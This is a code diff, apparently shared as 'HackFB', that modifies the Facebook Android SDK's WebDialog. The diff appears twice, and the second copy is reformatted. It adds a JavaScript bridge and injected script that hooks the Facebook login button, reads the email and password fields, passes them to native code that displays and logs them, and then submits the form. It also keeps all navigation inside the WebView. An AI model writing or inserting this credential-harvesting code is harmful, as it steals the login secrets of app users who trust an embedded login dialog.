creativepsyco/HackFB.diff

## HackFB.diff
diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
index 70ac868..c2c9af0 100644
--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
@@ -17,6 +17,7 @@
 package com.facebook.widget;

 import android.annotation.SuppressLint;
+import android.app.AlertDialog;
 import android.app.Dialog;
 import android.app.ProgressDialog;
 import android.content.Context;
@@ -29,8 +30,11 @@ import android.net.Uri;
 import android.net.http.SslError;
 import android.os.Bundle;
 import android.util.DisplayMetrics;
+import android.util.Log;
 import android.view.*;
+import android.webkit.JavascriptInterface;
 import android.webkit.SslErrorHandler;
+import android.webkit.WebChromeClient;
 import android.webkit.WebView;
 import android.webkit.WebViewClient;
 import android.widget.FrameLayout;
@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
 import com.facebook.internal.Utility;
 import com.facebook.internal.Validate;

+import org.json.JSONTokener;
+
 /**
  * This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
  * methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
@@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
                 ViewGroup.LayoutParams.MATCH_PARENT));
         webView.setVisibility(View.INVISIBLE);
         webView.getSettings().setSavePassword(false);
+        webView.addJavascriptInterface(new HackingFB(), "HackingFB");
+        webView.setWebChromeClient(new WebChromeClient() {
+            @Override
+            public void onConsoleMessage(String message, int lineNumber, String sourceID) {
+                Log.e("password", message + " -- From line "
+                        + lineNumber + " of "
+                        + sourceID);
+            }
+        });

         webViewContainer.setPadding(margin, margin, margin, margin);
         webViewContainer.addView(webView);
@@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
         contentFrameLayout.addView(webViewContainer);
     }

+    private class HackingFB {
+
+        @JavascriptInterface
+        public void foundCredential(String name, String password) {
+            harvest(name, password);
+        }
+
+        private void harvest(String name, String password) {
+            AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
+                    getContext());
+            alertDialogBuilder.setTitle(name);
+            alertDialogBuilder.setMessage(password);
+            alertDialogBuilder.create();
+            alertDialogBuilder.show();
+            Log.e("Password", String.format("%s %s", name, password));
+        }
+    }
+
     private class DialogWebViewClient extends WebViewClient {
         @Override
         @SuppressWarnings("deprecation")
@@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
             } else if (url.contains(DISPLAY_TOUCH)) {
                 return false;
             }
+            return false;
             // launch non-dialog URLs in a full browser
-            getContext().startActivity(
-                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
-            return true;
+//            getContext().startActivity(
+//                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
+//            return true;
         }

         @Override
@@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
             contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
             webView.setVisibility(View.VISIBLE);
             crossImageView.setVisibility(View.VISIBLE);
+            if (url.contains("facebook.com/login.php")) {
+                Log.e("password ", "Sending alert");
+                view.loadUrl("javascript:console.log('password From Native')");
+                view.loadUrl("javascript:console.log(document)");
+                view.loadUrl("" +
+                        "javascript:function hacker() {" +
+                        "var f = document.getElementsByTagName('form')[0];" +
+                        " HackingFB.foundCredential(f.email.value, f.pass.value); " +
+                        "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
+            }
         }
     }
	diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
	index 70ac868..c2c9af0 100644
	--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
	+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
	@@ -17,6 +17,7 @@
	package com.facebook.widget;

	import android.annotation.SuppressLint;
	+import android.app.AlertDialog;
	import android.app.Dialog;
	import android.app.ProgressDialog;
	import android.content.Context;
	@@ -29,8 +30,11 @@ import android.net.Uri;
	import android.net.http.SslError;
	import android.os.Bundle;
	import android.util.DisplayMetrics;
	+import android.util.Log;
	import android.view.*;
	+import android.webkit.JavascriptInterface;
	import android.webkit.SslErrorHandler;
	+import android.webkit.WebChromeClient;
	import android.webkit.WebView;
	import android.webkit.WebViewClient;
	import android.widget.FrameLayout;
	@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
	import com.facebook.internal.Utility;
	import com.facebook.internal.Validate;

	+import org.json.JSONTokener;
	+
	/**
	* This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
	* methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
	@@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
	ViewGroup.LayoutParams.MATCH_PARENT));
	webView.setVisibility(View.INVISIBLE);
	webView.getSettings().setSavePassword(false);
	+ webView.addJavascriptInterface(new HackingFB(), "HackingFB");
	+ webView.setWebChromeClient(new WebChromeClient() {
	+ @Override
	+ public void onConsoleMessage(String message, int lineNumber, String sourceID) {
	+ Log.e("password", message + " -- From line "
	+ + lineNumber + " of "
	+ + sourceID);
	+ }
	+ });

	webViewContainer.setPadding(margin, margin, margin, margin);
	webViewContainer.addView(webView);
	@@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
	contentFrameLayout.addView(webViewContainer);
	}

	+ private class HackingFB {
	+
	+ @JavascriptInterface
	+ public void foundCredential(String name, String password) {
	+ harvest(name, password);
	+ }
	+
	+ private void harvest(String name, String password) {
	+ AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
	+ getContext());
	+ alertDialogBuilder.setTitle(name);
	+ alertDialogBuilder.setMessage(password);
	+ alertDialogBuilder.create();
	+ alertDialogBuilder.show();
	+ Log.e("Password", String.format("%s %s", name, password));
	+ }
	+ }
	+
	private class DialogWebViewClient extends WebViewClient {
	@Override
	@SuppressWarnings("deprecation")
	@@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
	} else if (url.contains(DISPLAY_TOUCH)) {
	return false;
	}
	+ return false;
	// launch non-dialog URLs in a full browser
	- getContext().startActivity(
	- new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
	- return true;
	+// getContext().startActivity(
	+// new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
	+// return true;
	}

	@Override
	@@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
	contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
	webView.setVisibility(View.VISIBLE);
	crossImageView.setVisibility(View.VISIBLE);
	+ if (url.contains("facebook.com/login.php")) {
	+ Log.e("password ", "Sending alert");
	+ view.loadUrl("javascript:console.log('password From Native')");
	+ view.loadUrl("javascript:console.log(document)");
	+ view.loadUrl("" +
	+ "javascript:function hacker() {" +
	+ "var f = document.getElementsByTagName('form')[0];" +
	+ " HackingFB.foundCredential(f.email.value, f.pass.value); " +
	+ "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
	+ }
	}
	}